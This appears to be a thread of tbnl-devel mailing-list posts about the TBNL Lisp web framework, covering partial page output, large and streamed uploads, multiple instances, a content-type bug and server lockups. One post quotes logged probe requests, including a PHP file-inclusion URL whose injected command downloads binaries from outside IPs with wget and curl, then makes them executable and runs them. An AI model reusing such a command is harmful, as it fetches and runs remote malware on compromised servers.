Hi, I'd like to use TBNL for a web application that have a really slow page generation rate. At first I thought that send-headers was the solution: write the page header and navigation before launching the slow content generation and then write the content as it is generated. On the other hand, when I try it live with TBNL I have to wait for the whole page to be generated. Maybe is misinterpreted the documentation. Is it possible to write partial pages to the client stream with TBNL? I'm using apache2 with the latest mod_lisp2 and TBNL 0.9.9 on a Debian Etch system. -- Yannick Gingras

[tbnl-devel] large file uploads

I would like to prevent files over a certain size from being uploaded. I don't want to check after the fact; I'd like to abort request processing as soon as the content-length is known to be too large. Is it ok to close the content-stream and error out of initialize-instance on the request? Is there a better way? Zach

hey folks, Is it possible to run multiple tbnl instances behind the same apache+mod_lisp ? I mean, it is possible to have differnt lisp images with tbnl running behind one apache+mod_lisp ? This would mean that the name of the tbnl in the apache.conf and the port, both have to be different for the different images, right ? thanks, -- quasi Utopia Unlimited!

I'm new to this framework and web development in general: I ran across this problem today, and I think it's a bug (and I kinda fixed it), but I'm not sure... Anyway, using Laszlo as a front-end, I tried to post to a url served by tbnl. Couldn't get at the POST data, couldn't get at it, couldn't get at it. Finally, I noticed two things: 1) the header from laszlo for content-type was: "application/x-www-form-urlencoded;charset=UTF-8" 2) in initialize-instance and recompute-request-parameters, the code was: (string-equal "application/x-www-form-urlencoded" (string-assoc "content-type" headers-in)) So I tossed in: (string-equal "application/x-www-form-urlencoded" (string-assoc "content-type" headers-in) :end2 (length "application/x-www-form-urlencoded)) which is not particularly efficient, but is at least correct. Am I wrong?

Hi all, I'm working on reddit.com, which uses TBNL as its web framework. For the most part, all is well, but I've been running into an error lately that is causing me to worry. Basically, the symptom of the problem is that our website appears to pause, and all requests just hang (eventually they'll timeout on the browser side). I work against our server using remote SLIME. The SLIME session does not hang, but in order to bring the website back to life I log into our web server, use attachtty to view the running lisp process, and hit ctrl + c a few times, after which a debugger will pop open in Emacs that I can abort. I'm running CMUCL 19a on a FreeBSD box. I use apache and mod_lisp in front of TBNL. I haven't been able to find out what causes this lockup, nor do I understand why I must open the process on the web server (when I'm already cruising in SLIME) to wake it up. Has anyone seen any issues like this before? Or perhaps know if this is even a TBNL issue? I've pasted the output I see from the lisp process (via attachtty) and in my emacs session (after I send an interrupt). Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this: POST /xmlrpc/xmlrpc.php POST /blogs/xmlsrv/xmlrpc.php GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs: [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp Making requests to the website results in a 500 Internal Server Error. I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again. What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF? Zach

Hey, (tbnl:start-tbnl) does not return. It is supposed to return *Listener*, right? Ctr-C gives option to abort. Even if it does not return, the tbnl demo runs till I abort. I am running SBCL 0.9.9 on Debian AMD64 testing. Apache2 installed via apt-get and latest mod_lisp.c from repo downloaded 2 weeks back. TBNL and dependencies are latest. thanks, quasi

[tbnl-devel] uploading a huge file / ajax progress bar

Hi, I'm trying to see if it's feasible to use lisp + tbnl to build an internal documentation system that allows user to upload huge files. Typically users might upload files with size ranges from 20mb to 600mb. I'm using lispworks as the development platform, but intend to deploy the site in freebsd/linux + sbcl/cmucl. I notice that by uploading a 600mb file on win32 + lispworks + tbnl mod-lisp, the memory usage remains constant (ie. Lispworks is streaming the content directly to disk). However, with either freebsd/cmucl or linux/sbcl, top shows that all of the uploaded contents are first stored in memory and then get written to disk. This is a major scalability problem, I'm not sure if this is a design issue that can be fixed. Since uploading huge files take a bit of time, displaying a progress is a must; otherwise user might think that the browser hangs. It is also good to let them know how long will it take to upload the file so they can check back in couple minutes instead of staring at a stalled screen. There exist some open source implementations for php and ruby. http://www.raditha.com/php/progress.php http://sean.treadway.info/demo/upload/ I quickly went through the tbnl request post initialization routine and the rfc2388 module. It looks like what we need to do is to change rfc2388 to continuously write a report of the current upload progress to a file, and then add an entry point in tbnl to return a html page showing the current progress. This page can be launched by javascript when the upload form is submitted. Am I missing any important piece of information in this picture? If anyone can give me more pointers I would try my hands on this as an exercise. I'm not sure if anyone would find this useful though. Thanks in advance. -- Mac
